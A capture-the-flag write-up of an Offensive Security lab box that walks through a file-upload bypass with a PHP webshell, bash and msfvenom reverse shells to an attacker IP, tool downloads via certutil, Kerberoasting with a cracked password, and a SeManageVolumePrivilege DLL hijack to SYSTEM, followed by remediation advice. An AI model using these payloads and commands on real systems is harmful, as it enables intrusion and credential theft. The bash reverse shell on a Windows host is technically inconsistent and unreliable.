Box Overview

Access is a Windows Active Directory machine from Offensive Security’s Proving Grounds featuring file upload bypass, Kerberoasting attacks, and privilege escalation via SeManageVolumePrivilege exploitation.

Domain: access.offsec

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.229.187 -T4 -oN first.scan -p-

Open Ports:

  • 53/tcp - DNS
  • 80/tcp - HTTP (Apache 2.4.48 - XAMPP)
  • 88/tcp - Kerberos
  • 135/tcp - MSRPC
  • 139/445/tcp - SMB
  • 389/636/tcp - LDAP
  • 5985/tcp - WinRM
  • 9389/tcp - .NET Message Framing

Service Info:

  • Host: SERVER
  • Domain: access.offsec
  • OS: Windows Server (Domain Controller)

Initial Reconnaissance

Add to /etc/hosts:

echo "192.168.229.187 access.offsec SERVER.access.offsec" >> /etc/hosts

Web Exploitation - Port 80

Application Discovery

Technology Stack (Wappalyzer):

  • Apache 2.4.48 (Win64)
  • PHP 8.0.7
  • OpenSSL 1.1.1k
  • XAMPP Stack

Functionality: File upload feature present on main page

File Upload Bypass

Direct PHP Upload Blocked

Attempted to upload PHP webshell:

<?php system($_REQUEST['cmd']); ?>

Result: .php extension blocked by upload filter

.htaccess Bypass

Created malicious .htaccess file:

echo "AddType application/x-httpd-php .dork" > .htaccess

Explanation:

  • Instructs Apache to treat .dork files as PHP
  • Bypasses extension whitelist/blacklist

Upload successful!

PHP Webshell Creation

Generated reverse shell (revshells.com):

<?php
// PHP reverse shell payload
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.222/135 0>&1'");
?>

Saved as: revshell.dork

Port selection: Using port 135 (SMB) as outbound firewall likely allows this.

Upload Directory Discovery

gobuster dir -u http://192.168.229.187 \
  -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt

Result:

/UPLOADS (Status: 301) [--> http://192.168.229.187/UPLOADS/]

Upload location identified! 🎯

Initial Access

Setup listener:

nc -nlvp 135

Trigger webshell:

http://192.168.229.187/UPLOADS/revshell.dork

Shell caught!

C:\xampp\htdocs\uploads> whoami
access\svc_apache

C:\xampp\htdocs\uploads> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Limited service account - need to escalate!

User Enumeration

C:\Users> dir
 Volume in drive C has no label.

 Directory of C:\Users

04/08/2022  02:40 AM    <DIR>          .
04/08/2022  02:40 AM    <DIR>          ..
05/28/2021  03:53 AM    <DIR>          Administrator
05/28/2021  03:53 AM    <DIR>          Public
04/08/2022  02:39 AM    <DIR>          svc_apache
04/08/2022  02:40 AM    <DIR>          svc_mssql

Target identified: svc_mssql - likely has elevated privileges!

Lateral Movement - Kerberoasting

SPN Enumeration

Tool: Get-SPN.ps1

C:\Users\Public> certutil -urlcache -split -f http://192.168.45.222:80/Get-SPN.ps1

C:\Users\Public> powershell -ep bypass
PS C:\Users\Public> .\Get-SPN.ps1

Output (relevant):

Object Name =  MSSQL
DN          =  CN=MSSQL,CN=Users,DC=access,DC=offsec
Object Cat. =  CN=Person,CN=Schema,CN=Configuration,DC=access,DC=offsec
servicePrincipalNames
SPN( 1 )    =  MSSQLSvc/DC.access.offsec

MSSQL service account found! 🎯

Kerberoasting Attack

Tool: Invoke-Kerberoast.ps1

PS C:\Users\Public> Set-ExecutionPolicy Unrestricted -Scope Process
PS C:\Users\Public> Import-Module ./Invoke-kerberoast.ps1
PS C:\Users\Public> Invoke-Kerberoast

TGS Ticket Extracted:

TicketByteHexStream  : 
Hash                 : $krb5tgs$MSSQLSvc/DC.access.offsec:AD17CD5C4C46F5177BEA02AB39DAE531$E49279...
SamAccountName       : svc_mssql
DistinguishedName    : CN=MSSQL,CN=Users,DC=access,DC=offsec
ServicePrincipalName : MSSQLSvc/DC.access.offsec

Hash Cracking

# Clean hash (remove unnecessary data)
echo '$krb5tgs$23$*MSSQLSvc/DC.access.offsec*$ad17cd5c...' > mssql.hashcat

# Crack with hashcat
hashcat -m 13100 mssql.hashcat /usr/share/wordlists/rockyou.txt --force

Cracked in seconds!

$krb5tgs$23$*MSSQLSvc/DC.access.offsec*...:trustno1

Credentials obtained: svc_mssql:trustno1

Credential Validation

crackmapexec smb 192.168.229.187 -u svc_mssql -d access.offsec -p "trustno1" --shares

Result:

SMB  192.168.229.187  445  SERVER  [+] access.offsec\svc_mssql:trustno1 
Share           Permissions     Remark
-----           -----------     ------
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
SYSVOL          READ            Logon server share

Valid credentials confirmed!

Lateral Movement via RunAs

Challenge: WinRM not enabled for svc_mssql

Solution: Use RunasCs to execute commands as svc_mssql

Tool: Invoke-RunasCs.ps1

Generate Meterpreter Payload

msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.45.222 LPORT=1337 \
  -f exe -o revshell_access.exe

Execute as svc_mssql

PS C:\Users\Public> Set-ExecutionPolicy Unrestricted -Scope Process
PS C:\Users\Public> Import-Module ./Invoke-RunasCs.ps1
PS C:\Users\Public> Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "revshell_access.exe"

[*] Warning: The logon for user 'svc_mssql' is limited.

Shell caught as svc_mssql!

C:\Windows\system32> whoami
access\svc_mssql

C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled

Key finding: SeManageVolumePrivilege present! 🎯

Privilege Escalation - SeManageVolumePrivilege

Vulnerability Research

Reference: SeManageVolumeExploit

Attack Strategy:

  1. Exploit SeManageVolumePrivilege to gain write access to C:\
  2. Replace C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll
  3. Trigger DLL load via COM object instantiation
  4. DLL executes as SYSTEM

Step 1: Gain C:\ Write Access

Tool: SeManageVolumeExploit.exe

C:\Users\Public> certutil -urlcache -split -f http://192.168.45.222:80/SeManageVolumeExploit.exe

C:\Users\Public> .\SeManageVolumeExploit.exe
Entries changed: 924
DONE

Arbitrary C:\ write access achieved!

Step 2: Create Malicious DLL

msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=192.168.45.222 LPORT=9001 \
  -f dll -o Printconfig.dll

Step 3: Replace System DLL

PS> cd C:\Windows\System32\spool\drivers\x64\3

PS> iwr -uri http://192.168.45.222:80/Printconfig.dll -Outfile PrintConfig.dll

PS> dir

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
...
-a----        5/29/2024   4:18 AM           9216 PrintConfig.dll    <-- Our malicious DLL                                                  
-a----         4/8/2022  12:18 AM        3565568 PrintConfig.dll.bak  <-- Original backed up
...

Step 4: Trigger Execution

Setup listener:

sudo rlwrap nc -lnvp 9001

Instantiate COM object (triggers DLL load):

PS> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS> $object = [Activator]::CreateInstance($type)

SYSTEM shell obtained! 🎯

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
0c8c404d3b88625584c2f2e59ea7130f

Root flag captured - Owned!

Attack Chain Summary

  1. Web Enumeration → Found file upload on XAMPP
  2. .htaccess Upload → Bypassed PHP extension filter
  3. Webshell Upload → Uploaded .dork file treated as PHP
  4. Initial Access → Shell as svc_apache
  5. SPN Discovery → Found MSSQL service account
  6. Kerberoasting → Extracted TGS ticket
  7. Hash Cracking → Recovered password: trustno1
  8. Lateral Movement → RunasCs to execute as svc_mssql
  9. Privilege Discovery → Identified SeManageVolumePrivilege
  10. SeManage Exploit → Gained C:\ write access
  11. DLL Hijacking → Replaced PrintConfig.dll
  12. COM Trigger → Loaded malicious DLL as SYSTEM
  13. System Compromise → Full domain admin access

Vulnerability Analysis

File Upload Bypass

Vulnerability: Insufficient upload validation

Weak Protection

// Vulnerable code pattern
$allowed = ['jpg', 'png', 'gif'];
$ext = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, $allowed)) {
    die("File type not allowed");
}

.htaccess Abuse

How it works:

  1. Upload .htaccess with custom AddType directive
  2. Apache reads .htaccess from upload directory
  3. Subsequent uploads with custom extension execute as PHP

Exploitation:

AddType application/x-httpd-php .dork
AddType application/x-httpd-php .hack
AddType application/x-httpd-php .pwn

Kerberoasting

Attack Overview:

Step 1: SPN Discovery

# Find accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Step 2: Request TGS Ticket

# Request service ticket (anyone can do this!)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC.access.offsec"

Step 3: Extract & Crack

# Ticket encrypted with service account's password
# Crack offline - no failed login attempts!
hashcat -m 13100 ticket.hash rockyou.txt

Why it works:

  • Service tickets encrypted with account password (not computer secret)
  • No authentication required to request tickets
  • Weak passwords = easy crack
  • No failed login events logged

SeManageVolumePrivilege Abuse

Privilege Purpose: Manage disk volumes (defrag, diskpart operations)

Security Impact: Can create junction points and modify volume structures

Exploitation Technique

SeManageVolumeExploit mechanism:

  1. Create Mount Point
C:\target -> \??\C:\
  1. Modify NTFS Metadata
  • Exploits privilege to alter file security descriptors
  • Grants Everyone group full control
  • Affects entire C:\ drive
  1. DLL Hijacking Opportunity
  • Write to C:\Windows\System32\spool\drivers\x64\3\
  • Replace PrintConfig.dll
  • Loaded by Print Spooler service (SYSTEM)

COM Object Trigger

# CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} = PrintNotify
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
# Instantiation triggers DllMain() in PrintConfig.dll

Remediation

File Upload Security

Validation

// Proper file upload validation
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif'];
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo, $_FILES['file']['tmp_name']);

if (!in_array($mime, $allowed_mime)) {
    die("Invalid file type");
}

// Validate extension
$allowed_ext = ['jpg', 'jpeg', 'png', 'gif'];
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));

if (!in_array($ext, $allowed_ext)) {
    die("Invalid extension");
}

// Rename file with UUID
$new_name = bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['file']['tmp_name'], "/uploads/$new_name");

Apache Configuration

# Disable .htaccess in upload directories
<Directory "/var/www/uploads">
    AllowOverride None
    Options -ExecCGI
    php_flag engine off
</Directory>

Kerberoasting Prevention

Strong Service Account Passwords

# Generate 64-character random password
$Password = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 64 | ForEach-Object {[char]$_})
Set-ADAccountPassword -Identity svc_mssql -NewPassword (ConvertTo-SecureString $Password -AsPlainText -Force)

Managed Service Accounts

# Use Group Managed Service Accounts (no password!)
New-ADServiceAccount -Name gMSA_MSSQL -DNSHostName DC.access.offsec
Install-ADServiceAccount -Identity gMSA_MSSQL

Monitoring

# Alert on TGS-REP requests
Event ID 4769 (Kerberos Service Ticket Requested)
# Filter: Encryption Type = 0x17 (RC4-HMAC - weak crypto)

SeManageVolumePrivilege Hardening

Remove Privilege

# Audit who has SeManageVolumePrivilege
secedit /export /cfg secpol.cfg
Get-Content secpol.cfg | Select-String "SeManageVolumePrivilege"

# Remove from service accounts unless absolutely necessary

Monitoring

# Enable audit of privilege use
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable

# Monitor for:
# - Event ID 4673 (Sensitive privilege use)
# - Event ID 4907 (Auditing settings changed)

DLL Hijacking Prevention

# Enable Windows Defender Application Control
# Implement strict DLL load policies
# Use signed DLLs only in system directories

Tools Used

  • nmap
  • Wappalyzer
  • gobuster
  • Burp Suite
  • netcat
  • certutil
  • Get-SPN.ps1
  • Invoke-Kerberoast.ps1
  • hashcat
  • crackmapexec
  • Invoke-RunasCs.ps1
  • msfvenom
  • SeManageVolumeExploit.exe

Techniques

  • Active Directory enumeration
  • File upload bypass via .htaccess
  • Webshell deployment
  • Kerberoasting attack
  • Offline password cracking
  • Lateral movement via RunAs
  • Token privilege enumeration
  • SeManageVolumePrivilege exploitation
  • DLL hijacking
  • COM object abuse

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice

“From Apache to SYSTEM - when privileges meet perseverance.”